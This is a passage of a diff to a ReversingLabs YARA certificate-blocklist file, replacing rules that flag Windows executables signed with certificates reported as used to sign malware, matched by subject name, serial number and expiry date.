+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xA6\\x8F\\xE5\\xBB\\xBA\\xE7\\x9C\\x81\\xE4\\xBA\\x94\\xE6\\x98\\x9F\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:43:24:ff:41:f0:a7:b1:6f:fc:c9:3d:ff:a8:fa:99" and 1600300800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6ea47017-1296-5409-8ff2-ef69434233ff"
+		id = "f7358f71-421f-57fa-abdf-ab479f4b7007"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15368-L15384"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9456-L9472"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "88c63a921a300e1b985d084c3ab1a2485713b4c674dafd419d092e5562f121d7"
+		logic_hash = "b0f43caec1cfc5b2d1512d7fcf0bcf1e02fc81764b4376b081f38c4de328eab2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27533,21 +49927,21 @@ rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "3a:94:9e:f0:3d:9d:d2:d1:50:b2:4b:27:4f:f6:d7:b4" and 1474156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Idris Kanchwala Holding Corp." and pe.signatures [ i ] . serial == "0b:98:0f:c8:78:3e:4f:15:8e:41:82:9a:b2:1b:ab:81" and 1631750400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "70e770dd-95fd-5273-b6ee-9bb5eea30e3b"
+		id = "50ffd0a0-d861-53d7-a7dc-f74ccc49eff8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15386-L15404"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9474-L9492"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "84ddc08a0a55200f644778a0e3482f15e82d74c524f12a7ad91b1c3d4acfc731"
+		logic_hash = "3c7d57a655f76a6e5ef6b0e770db7c91d0830b6b0b37caef5ef9e3e78ad1fd75"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27557,21 +49951,21 @@ rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Soblosol Limited" and ( pe.signatures [ i ] . serial == "00:95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" or pe.signatures [ i ] . serial == "95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" ) and 1543968000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLDING LA LTD" and ( pe.signatures [ i ] . serial == "00:d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" or pe.signatures [ i ] . serial == "d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" ) and 1619136000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8dfc50be-7316-5a52-937b-4551aa642b7e"
+		id = "ed427336-6833-5e09-8ebe-039c8cd50846"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15406-L15424"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9494-L9512"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3b5e5b81890f1dea3dc0858cade54e7f88a21861818be79c3e7fba066f80d491"
+		logic_hash = "6d6db87227d7be559afa67c4f2b65b01f26741fdf337d920241a633bb036426f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27581,21 +49975,21 @@ rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INC SALYUT" and ( pe.signatures [ i ] . serial == "00:df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" or pe.signatures [ i ] . serial == "df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" ) and 1613433600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAN MARINO INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" or pe.signatures [ i ] . serial == "d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" ) and 1631059200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2cbd1fd-ef68-5128-9c45-88b73a49130f"
+		id = "f319592a-5f08-5f2c-b840-5f897695e054"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15426-L15442"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9514-L9532"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "43b56736afe081a1215db67b933413d7fbafbfc1be8213b330668578921ebca7"
+		logic_hash = "c74512e95e2d6aedecb1dbd30fac6fde40d1e9520c89b785519694d9bc9ba854"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27605,21 +49999,21 @@ rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gidrokon LLC" and pe.signatures [ i ] . serial == "76:0c:ef:38:6b:63:40:67:51:ae:83:a9:ea:e9:23:42" and 1601942400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AmiraCo Oy" and ( pe.signatures [ i ] . serial == "00:96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" or pe.signatures [ i ] . serial == "96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" ) and 1615248000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "db968865-fb1e-57b5-8968-6510e83c02ac"
+		id = "123e5aed-0ef4-5146-81bb-5d455a9cf92e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15444-L15460"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9534-L9550"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "85e187684d62c33ef6f69323b837ef2d44facab8278b512d7bd6afd49eaed976"
+		logic_hash = "f6b454a575ea7635d5edebffe3c9c83e95312ee33245e733987532348258733e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27629,21 +50023,21 @@ rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "5c:26:25:fa:83:6a:64:f4:88:2c:56:cc:7a:45:f0:ed" and 1474416000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" and 1618531200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "27afa64e-0c9e-58ca-a4e1-db97cde66427"
+		id = "959b10fe-fbd0-5642-a5d9-4ac2e0474666"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15462-L15478"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9552-L9570"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ef244587c9eb1e1cb2f8a9c161e5dd9ff70e9764586f16e011334400ee400ed9"
+		logic_hash = "ea30d85c057f9363ce29d4c024097c50a8752dd2095481181322fe5d5c92bb4b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27653,21 +50047,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "7d:f6:fa:58:0f:84:49:3c:41:4e:e0:e4:31:08:67:37" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIDDRA INTERNATIONAL CORP." and ( pe.signatures [ i ] . serial == "00:a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" or pe.signatures [ i ] . serial == "a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" ) and 1618963200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7182f3f2-7b2a-5c29-b7a9-607feafbe570"
+		id = "4dbe7db7-2f61-558c-a6dc-875ba87322c7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15480-L15496"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9572-L9590"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "15fdb95fe5429cdc0263615c2b7c90d21f37b52954c5ce568c1293cd3a544730"
+		logic_hash = "7e90c29bcfe4632e70b61a0cf2ab48a3de986bd5c6c730f64a363f4f3d79a3f4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27677,21 +50071,21 @@ rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "30:9d:2e:11:5f:1f:e2:99:3e:e2:e0:63" and 1467102525 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SALES & MAINTENANCE LIMITED" and ( pe.signatures [ i ] . serial == "00:93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" or pe.signatures [ i ] . serial == "93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" ) and 1616889600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "61c5d5ed-ca2c-5f71-893b-4c933b37fa27"
+		id = "83d08ca6-2a0b-5da3-8d53-7bf8bcc361cf"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15498-L15516"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9592-L9610"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4a97171c6dfaa8d249ab0be1ce264b596d266ff4697d869a4d1f90cc0e2c49b7"
+		logic_hash = "02c55b182bc9843334baed9c0a7cca2c88cd1de00ca9b47b10ec79b7a5acf9bb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27701,21 +50095,21 @@ rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GERMES, OOO" and ( pe.signatures [ i ] . serial == "00:90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" or pe.signatures [ i ] . serial == "90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" ) and 1487635200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TLGM ApS" and ( pe.signatures [ i ] . serial == "00:af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" or pe.signatures [ i ] . serial == "af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" ) and 1617062400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "10bee456-21c0-51a0-988b-43daf65e596b"
+		id = "d173c2b2-2b76-521a-aac1-ae69fdf5b16b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15518-L15534"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9612-L9628"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "03ea946fa99ed7a6ab23cb26dbf514b6c062d63371c9e2a5ddf999acd1954955"
+		logic_hash = "2f0defa1e1d905d937677e96f2a0955d9737f6976596932cc093fdecfea3fdb0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27725,21 +50119,21 @@ rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "3f:15:c3" and 1110577130 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trap Capital ApS" and pe.signatures [ i ] . serial == "71:8e:89:dd:b3:32:57:ea:77:ba:74:be:7f:2b:af:1d" and 1635462927 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4dc1523f-edc8-52e2-99aa-7389c0eb5e54"
+		id = "173f89ca-e7b3-507b-96c1-325dd06210f8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15536-L15552"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9630-L9646"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "267df1c327b65938b2b82a53ec8345290659560c69c9a70f2866fe7bd73513a7"
+		logic_hash = "f618547942fcd9b3d1104cb5bedeecec8596fa7cc34bca838b6120085b305d73"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27749,21 +50143,21 @@ rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRAGON BUSINESS EQUIPMENT LIMITED" and pe.signatures [ i ] . serial == "28:5e:cc:bd:1d:00:00:e6:40:b8:43:07:ef:88:cd:9f" and 1611619200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE & AERIAL FITNESS LIMITED" and pe.signatures [ i ] . serial == "4d:3e:38:f4:ae:bb:c3:22:57:45:07:26:b2:9b:e1:17" and 1636123882 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c8b5b632-26e6-5a78-99be-b50b1240dbec"
+		id = "b7731056-1674-5375-a3cb-69632670d6d9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15554-L15570"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9648-L9666"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4bee740eaf359462cd85c6232160c6b1fc3df67acfe731da9978f0b8a304a93f"
+		logic_hash = "a8c99cc30b791a76fe3cd48184bf95ee47abb30bd200128efd2f5295ee18f7b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27773,21 +50167,21 @@ rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhengzhoushi Tiekelian Information Technology Co.,Ltd" and pe.signatures [ i ] . serial == "55:ab:71:a3:f9:dd:e3:ef:20:c7:88:dd:1d:5f:f6:c3" and 1323907200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Contact Merger Holding ApS" and ( pe.signatures [ i ] . serial == "00:8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" or pe.signatures [ i ] . serial == "8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" ) and 1636039748 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "30570c07-9ba1-5b7c-a369-c6def80f9dc5"
+		id = "2578655e-6420-5a67-9116-cab5cf5bc195"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15572-L15588"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9668-L9686"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7a1130413ae8807dc1ec96a6b1c3bac705a1520f7268db2848b997f6f3f9fc9b"
+		logic_hash = "6328fd5dbb497c69ddc9151f85754669760b709ecbff3e8f320a40a62ca0dd2c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27797,21 +50191,21 @@ rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:ec:a2:62:10:73:7a:54:42:ff:8b:47" and 1476437049 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAIN BUILDING TEAM s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" or pe.signatures [ i ] . serial == "ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" ) and 1635854205 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dc8428f3-ff28-5fcf-9855-f20c68973afe"
+		id = "77319b9c-6075-5ac7-958c-d76916873e85"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15590-L15606"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9688-L9706"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "604ba3fa671cc98e42caf80d07bc9650d193f898413517b46482f183b0f7008a"
+		logic_hash = "431e3364a42b272d9b71b92dee44cc185ef034a45a0b72bbda82cf7e9b29c355"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27821,21 +50215,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0f:20:38:39:a9:c6:3b:87:98:a7:cb:31" and 1480923809 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rakurs LLC" and ( pe.signatures [ i ] . serial == "00:fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" or pe.signatures [ i ] . serial == "fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" ) and 1636046757 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
